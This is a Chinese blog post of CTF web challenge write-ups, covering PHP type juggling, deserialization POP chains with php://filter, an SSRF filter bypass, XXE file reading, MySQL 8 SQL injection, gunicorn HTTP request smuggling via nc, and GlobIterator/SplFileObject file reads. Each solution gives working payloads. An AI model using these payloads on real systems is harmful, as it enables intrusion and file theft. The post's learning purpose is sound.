携手创作,共同成长!这是我参与「掘金日新计划 · 8 月更文挑战」的第22天,点击查看活动详情
WEB
冬奥会
源码:
<?php
show_source(__FILE__);
$Step1=False;
$Step2=False;
$info=(array)json_decode(@$_GET['Information']);
if(is_array($info)){
var_dump($info);
is_numeric(@$info["year"])?die("Sorry~"):NULL;
if(@$info["year"]){
($info["year"]=2022)?$Step1=True:NULL;
}
if(is_array(@$info["items"])){
if(!is_array($info["items"][1])OR count($info["items"])!==3 ) die("Sorry~");
$status = array_search("skiing", $info["items"]);
$status===false?die("Sorry~"):NULL;
foreach($info["items"] as $key=>$val){
$val==="skiing"?die("Sorry~"):NULL;
}
$Step2=True;
}
}
if($Step1 && $Step2){
include "2022flag.php";echo $flag;
}
?>
//array(0) { }
代码审计,是get传参information 要求'year'为2022 'item'为三个☞的数组 并且第[1]和的值是数组 因为是JSON_decode所以格式是{"key1":obj ","key2":"obj2"....} ?Information={"year":"2022a","items":["gh",["asaf","qweas"],0]}
这个题目收获了json数据的格式,以及三个等于号和两个等于号的区别。
Pop2022
Happy New Year~ MAKE A WISH
<?php
echo 'Happy New Year~ MAKE A WISH<br>';
if(isset($_GET['wish'])){
@unserialize($_GET['wish']);
}
else{
$a=new Road_is_Long;
highlight_file(__FILE__);
}
/***************************pop your 2022*****************************/
class Road_is_Long{
public $page;
public $string;
public function __construct($file='index.php'){
$this->page = $file;
}
public function __toString(){
return $this->string->page;
}
public function __wakeup(){
if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {
echo "You can Not Enter 2022";
$this->page = "index.php";
}
}
}
class Try_Work_Hard{
protected $var;
public function append($value){
include($value);
}
public function __invoke(){
$this->append($this->var);
}
}
class Make_a_Change{
public $effort;
public function __construct(){
$this->effort = array();
}
public function __get($key){
$function = $this->effort;
return $function();
}
}
/**********************Try to See flag.php*****************************/
题目的流程: Road_is_Long.wakeup.page string->new Make_a_Change var->php://filter/read=convert.base64-encode/resource=flag.php
payload
<?php
class Try_Work_Hard {
protected $var="php://filter/read=convert.base64-encode/resource=flag.php";
}
class Make_a_Change{
public $effort;
}
class Road_is_Long{
public $page;
public $string;
public function __construct(){
$this->string = new Make_a_Change();
}
}
$a = new Road_is_Long;
$a->page = new Road_is_Long();
$a->page->string->effort = new Try_Work_Hard();
echo urlencode(serialize($a));
?>
?wish=O%3A12%3A%22Road_is_Long%22%3A2%3A%7Bs%3A4%3A%22page%22%3BO%3A12%3A%22Road_is_Long%22%3A2%3A%7Bs%3A4%3A%22page%22%3BN%3Bs%3A6%3A%22string%22%3BO%3A13%3A%22Make_a_Change%22%3A1%3A%7Bs%3A6%3A%22effort%22%3BO%3A13%3A%22Try_Work_Hard%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D%7Ds%3A6%3A%22string%22%3BO%3A13%3A%22Make_a_Change%22%3A1%3A%7Bs%3A6%3A%22effort%22%3BN%3B%7D%7D
通过这个题目收获了php序列化和反序列化。还有php伪协议读取文件内容。
这是一道代码审计题
打开出现一个/index查看源代码,提示要传参url。
发现这个文件。
这是表情解密
www.atoolbox.net/Tool.php?Id…
def geneSign():
if(control_key==1):
return render_template("index.html")
else:
return "You have not access to this page!"
def check_ssrf(url):
hostname = urlparse(url).hostname
try:
if not re.match('https?://(?:[-\w.]|(?:%[\da-fA-F]{2}))+', url):
if not re.match('https?://@(?:[-\w.]|(?:%[\da-fA-F]{2}))+', url):
raise BaseException("url format error")
if re.match('https?://@(?:[-\w.]|(?:%[\da-fA-F]{2}))+', url):
if judge_ip(hostname):
return True
return False, "You not get the right clue!"
else:
ip_address = socket.getaddrinfo(hostname,'http')[0][4][0]
if is_inner_ipaddress(ip_address):
return False,"inner ip address attack"
else:
return False, "You not get the right clue!"
except BaseException as e:
return False, str(e)
except:
return False, "unknow error"
def ip2long(ip_addr):
return struct.unpack("!L", socket.inet_aton(ip_addr))[0]
def is_inner_ipaddress(ip):
ip = ip2long(ip)
print(ip)
return ip2long('127.0.0.0') >> 24 == ip >> 24 or ip2long('10.0.0.0') >> 24 == ip >> 24 or ip2long('172.16.0.0') >> 20 == ip >> 20 or ip2long('192.168.0.0') >> 16 == ip >> 16 or ip2long('0.0.0.0') >> 24 == ip >> 24
def waf1(ip):
forbidden_list = [ '.', '0', '1', '2', '7']
for word in forbidden_list:
if ip and word:
if word in ip.lower():
return True
return False
def judge_ip(ip):
if(waf1(ip)):
return Fasle
else:
addr = addr.encode(encoding = "utf-8")
ipp = base64.encodestring(addr)
ipp = ipp.strip().lower().decode()
if(ip==ipp):
global control_key
control_key = 1
return True
else:
return Fals
源码只有返回为true的时候才可以触发,要让ip==ipp, addr=127.0.0.1,将127.0.0.1进行base64编码,然后转小写base64解码和ip相同的话就为true,
/index?url=https://@mti3ljaumc4x //一定要注意这里的@不能丢,
然后进行传参 得到一个cookie aW4gZmFjdCBjb29raWUgaXMgdXNlZnVsIQ==
将原来的cookie进行替换。
a_cookie = aW4gZmFjdCBjb29raWUgaXMgdXNlZnVsIQ==
然后会得到一个xm。
function codelogin(){
var name = $("#name").val();
var password = $("#password").val();
if(name == "" || word == ""){
alert("Please enter the username and password!");
return;
}
var data = "<user><name>" + name + "</name><password>" + password + "</password></user>";
$.ajax({
contentType: "application/xml;charset=utf-8",
type: "POST",
url: "codelogin",
data: data,
dataType: "xml",
anysc: false,
success: function (result) {
var code = result.getElementsByTagName("code")[0].childNodes[0].nodeValue;
var msg = result.getElementsByTagName("msg")[0].childNodes[0].nodeValue;
if(code == "0"){
$(".msg").text(msg + " login fail!");
}else if(code == "1"){
$(".msg").text(msg + " login success!");
}else{
$(".msg").text("error:" + msg);
}
},
error: function (XMLHttpRequest,textStatus,errorThrown) {
$(".msg").text(errorThrown + ':' + textStatus);
}
});
}
继续xml伪造,这里有xxe漏洞
```xml
<!DOCTYPE ANY [
<!ENTITY f SYSTEM "./flag.txt">
]>
<user>
<name>
&f;
</name>
<password>
password
</password></user>
然后以post的方式传入 /mti3ljaumc4x/codelogin 就能得到flag 通过这个最主要是学会了把127.0.0.1过滤了,该怎么绕过,这里之前没见过,这次学会了通过base64的格式可以绕过。这里是一个知识点.
Easy-SQL
59.110.159.206:7010?id=-8 --+,得到一个ypHeMPardErE.zip@beaxia.cn,然后访问ypHeMPardErE.zip 会得到源码
<?php
include "./config.php";
// error_reporting(0);
// highlight_file(__FILE__);
$conn = mysqli_connect($hostname, $username, $password, $database);
if ($conn->connect_errno) {
die("Connection failed: " . $conn->connect_errno);
}
echo "Where is the database?"."<br>";
echo "try ?id";
function sqlWaf($s)
{
$filter = '/xml|extractvalue|regexp|copy|read|file|select|between|from|where|create|grand|dir|insert|link|substr|mid|server|drop|=|>|<|;|"|\^|\||\ |\'/i';
if (preg_match($filter,$s))
return False;
return True;
}
if (isset($_GET['id']))
{
$id = $_GET['id'];
$sql = "select * from users where id=$id";
$safe = preg_match('/select/is', $id);
if($safe!==0)
die("No select!");
$result = mysqli_query($conn, $sql);
if ($result)
{
$row = mysqli_fetch_array($result);
echo "<h3>" . $row['username'] . "</h3><br>";
echo "<h3>" . $row['passwd'] . "</h3>";
}
else
die('<br>Error!');
}
if (isset($_POST['username']) && isset($_POST['passwd']))
{
$username = strval($_POST['username']);
$passwd = strval($_POST['passwd']);
if ( !sqlWaf($passwd) )
die('damn hacker');
$sql = "SELECT * FROM users WHERE username='${username}' AND passwd= '${passwd}'";
$result = $conn->query($sql);
if ($result->num_rows > 0) {
$row = $result->fetch_assoc();
if ( $row['username'] === 'admin' && $row['passwd'] )
{
if ($row['passwd'] == $passwd)
{
die($flag);
} else {
die("username or passwd wrong, are you admin?");
}
} else {
die("wrong user");
}
} else {
die("user not exist or wrong passwd");
}
}
mysqli_close($conn);
?>
要求是post传参username,passwd. row['username'] === 'admin' && row['passwd']和passwd
payload :username=-1' union values row("admin","admin","admin")%23&passwd=admin 通过这个题目学到了mysql8的特性,可以通过union values row方式可以读取内容。
让我康康!
这是一个HTTP走私题目。
burpsuite抓包回显服务器是gunicorn/20.0.0
这个服务器版本有HTTP走私漏洞,查看源代码,出现一个try flag,然后访问/flag;.txt。
输入flag,回显一个flag is in '/fl4g'
echo -en "POST / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 76\r\nSec-Websocket-Key1: x\r\n\r\nxxxxxxxxPOST /fl4g HTTP/1.1\r\nHost: localhost\r\nContent-Length: 55\r\n\r\nPOST / HTTP/1.1\r\nHost: 127.0.0.1:80\r\n\r\n" | nc 59.110.159.206 7020
回显本地访问。
echo -en "GET / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 90\r\nSec-Websocket-Key1: x\r\n\r\nxxxxxxxxGET /fl4g HTTP/1.1\r\nHost: localhost\r\nsecr3t_ip:127.0.0.1\r\nContent-Length: 55\r\n\r\nGET / HTTP/1.1\r\nHost: 127.0.0.1:80\r\n\r\n" | nc 59.110.159.206 7020
这个题目学到了HTTP走私,/r/n的使用,对于TE,CL的方式也有了学习。
findme
<?php
highlight_file(__FILE__);
class a{
public $un0;
public $un1;
public $un2;
public $un3;
public $un4;
public function __destruct(){
if(!empty($this->un0) && empty($this->un2)){
$this -> Givemeanew();
if($this -> un3 === 'unserialize'){
$this -> yigei();
}
else{
$this -> giao();
}
}
}
public function Givemeanew(){
$this -> un4 = new $this->un0($this -> un1);
}
public function yigei(){
echo 'Your output: '.$this->un4;
}
public function giao(){
@eval($this->un2);
}
public function __wakeup(){
include $this -> un2.'hint.php';
}
}
$data = $_POST['data'];
unserialize($data);
通过php为协议读取hint内容
<?php
class a{
public $un0;
public $un1;
public $un2='php://filter/read=convert.base64-encode/resource=';
public $un3;
public $un4;
}
$a=new a();
echo serialize($a);
?>
然后base64解密得到的内容
<?php
$a = 'flag在当前目录下以字母f开头的txt中,无法爆破出来';
目录遍历:
<?php
class a{
public $un0='GlobIterator';
public $un1="glob://f*.txt";
public $un2;
public $un3='unserialize';
public $un4;
}
$a=new a();
echo serialize($a);
回显出文件 fA1TE_GRo9rde_OScter5r.txt 用SplFileObject读文件
<?php
class a{
public $un0='SplFileObject';
public $un1="fA1TE_GRo9rde_OScter5r.txt";
public $un2;
public $un3='unserialize';
public $un4;
}
$a=new a();
echo serialize($a);
回显出flag ISCC{DQnm19dw_SPxQwQsK_21EnFvN} 这个题目学会了php伪协议和
爱国敬业好青年-2
主页面是一个假页面,burpsuite先get方式传入change页面,出现一个open,然后再访问flag页面,post提交 lati=116°23′E&langti=39°54′N 就是flag.
